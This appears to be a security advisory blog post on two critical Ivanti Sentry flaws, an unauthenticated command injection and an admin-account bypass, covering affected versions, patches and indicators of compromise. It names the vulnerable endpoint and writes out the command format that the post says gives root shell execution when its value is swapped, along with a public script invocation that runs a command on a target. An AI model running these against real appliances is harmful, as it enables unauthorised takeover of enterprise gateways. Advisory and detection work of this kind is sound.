- Severity: CVE-2026-10520: CVSS 10.0 (Critical) · CVE-2026-10523: CVSS 9.9 (Critical)
- Affected: Ivanti Sentry <= 10.5.1, <= 10.6.1, <= 10.7.0 (all branches)
- Patched: June 9, 2026 · Exploitation: No confirmed in-the-wild exploitation; public PoC released June 10, 2026 by watchTowr Labs
Introduction
Ivanti Sentry (formerly MobileIron Sentry) is an in-line gateway appliance that manages, encrypts, and secures traffic between enterprise mobile devices and back-end systems like Microsoft Exchange. It lives at the network edge with a direct path to internal infrastructure, which makes it a high-value target.
On June 9, 2026, Ivanti disclosed two critical vulnerabilities. CVE-2026-10520 is an OS Command Injection flaw (CWE-78) in Sentry’s internal configuration API, requiring zero authentication and zero user interaction. CVE-2026-10523 is an Authentication Bypass (CWE-288) that lets an unauthenticated attacker create arbitrary admin accounts. Together they give attackers two independent no-credential paths to full appliance control.
Neither affects Ivanti’s cloud or SaaS products. On-premises Sentry only.
By June 10, one day after the advisory, watchTowr Labs had published a full technical breakdown and a working public PoC. Patch now, outside your normal cycle.
Attribution note: The technical depth here comes directly from watchTowr Labs’ original writeup and Rapid7’s ETR. Researcher Bryan Lam is credited for CVE-2026-10523. We’re standing on the shoulders of people who did the hard work.
What Happened
CVE-2026-10520: The “Internal” API That Was Everyone’s API
Here’s the thing about internal APIs: they’re supposed to be internal. :/
Ivanti Sentry’s Spring Boot web application ships a controller ConfigServiceController that handles internal configuration commands under /mics. The vulnerable endpoint:
POST /mics/api/v2/sentry/mics-config/handleMessageNo authentication. No access restriction before the patch. The endpoint accepts a user-supplied message string, parses it into a command, module, xpath, and value, then routes it through a switch statement. When command equals execute, the call flows into handleExecute() and eventually executeNativeCommand(), which invokes native system-level methods via Java reflection — with the attacker-supplied XML determining what runs. No sanitisation. No validation. Root OS commands, fully attacker-controlled.
The internal command format Ivanti intended for their own use looks like this:
execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>/bin/cat /sys/devices/virtual/dmi/id/product_name</reqandres></commandexec>Swap out the /bin/cat value for any shell command. That’s it. The reqandres field is your terminal. watchTowr confirmed the command output returns in the HTTP response body. Root. Zero credentials.
The fix hardcodes the input to a single benign command and adds Apache-level regex rules to block unauthenticated access to the entire path, essentially retrofitting the authentication that should have been there from the start.
CVE-2026-10523: The Admin Account Dispenser
Discovered by researcher Bryan Lam, CVE-2026-10523 (CVSS 9.9, CWE-288) lets a remote unauthenticated attacker create arbitrary administrative accounts and gain full admin access to the Sentry management panel. The system fails to distinguish authenticated from unauthenticated users during privileged account creation, an alternate path that had no lock on the door.
While CVE-2026-10520 is the headline, CVE-2026-10523 is a complete administrative takeover on its own. Patch both.
Exploit maturity: Public PoC available via watchTowr Labs’ GitHub as of June 10, 2026. No confirmed in-the-wild exploitation at publication; NCSC-NL flagged elevated exploitation likelihood immediately after watchTowr’s disclosure.
Why This Is Especially Dangerous
- Sentry lives at the edge. Compromising it exposes credentials, session tokens, and directory integrations. It is a lateral movement launchpad, not just a single box.
- Root means full persistence. Backdoors, modified startup scripts, new system users. Cleanup requires full reimaging.
- Public PoC lowers the floor. The watchTowr script takes
--urland--cmdas arguments. Advanced capability not required. - Two independent attack paths. CVE-2026-10520 gives OS-level root. CVE-2026-10523 gives admin panel access. Patching one without the other leaves a door open.
- Ivanti Sentry has KEV history. CVE-2023-38035 and CVE-2020-15505 both made CISA’s Known Exploited Vulnerabilities catalog. Threat actors know this product and where it sits.
Most at risk: organisations with Sentry appliances internet-exposed or reachable from less-trusted segments, particularly government, finance, healthcare, and defence.
Affected Versions
| Branch | Vulnerable Versions | Fixed Version |
|---|---|---|
| R10.5 | 10.5.1 and earlier | R10.5.2 |
| R10.6 | 10.6.1 and earlier | R10.6.2 |
| R10.7 | 10.7.0 and earlier | R10.7.1 |
Not affected: Ivanti cloud-hosted and SaaS products. On-premises only.
Mitigations
1. Patch immediately
Update to R10.5.2, R10.6.2, or R10.7.1. Both CVEs are fixed in all three releases. ISOs and update packages are at support.mobileiron.com. Ivanti asked customers to update “right away”, take that literally.
2. Restrict network access while you patch
If you need time before patching, restrict Sentry management interfaces to trusted admin networks, enforce segmentation so Sentry is not directly internet-reachable, and apply temporary edge controls. These reduce exposure but do not substitute for patching.
3. Run watchTowr’s detection script
watchTowr’s Detection Artefact Generator checks for both CVEs against your instance:
python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://[your-sentry-host] --cmd "uname -a"Indicators of Compromise
No specific IoCs (IPs, hashes, infrastructure) have been publicly confirmed as of June 11, 2026. Use these behavioural checks:
On the device: unexpected new system users or admin accounts in /etc/passwd or the Sentry admin panel; new or modified cron jobs, systemd units, or init scripts; unexpected network listener processes; recently written executables in /tmp or /var/tmp.
In logs: POST requests to /mics/api/v2/sentry/mics-config/handleMessage from external IPs (this endpoint should never receive external traffic post-patch); unexpected HTTP 200 responses from that path; unexpected admin account creation events.
In traffic: unexpected outbound connections from the appliance to external IPs; DNS queries to unfamiliar domains; lateral movement traffic from the Sentry host to internal systems.
If you suspect compromise, treat the appliance as fully owned. Contain it, rotate all credentials that transited it (Exchange service accounts, LDAP bind credentials, MDM certificates), and restore from a known-good state.
Check the Ivanti advisory at hub.ivanti.com for updated guidance. This post will be updated if confirmed exploitation IoCs become available.
References
- Ivanti Security Advisory - CVE-2026-10520 & CVE-2026-10523
- NVD - CVE-2026-10520
- watchTowr Labs - Technical Analysis & PoC (CVE-2026-10520)
- watchTowr Labs - Detection Artefact Generator (GitHub)
- Rapid7 Emergent Threat Response - CVE-2026-10520 & CVE-2026-10523
- SOCRadar - Ivanti Sentry CVE-2026-10520 RCE Analysis
- Help Net Security - Critical Ivanti Sentry flaw
- CWE-78 - OS Command Injection
- CWE-288 - Authentication Bypass Using an Alternate Path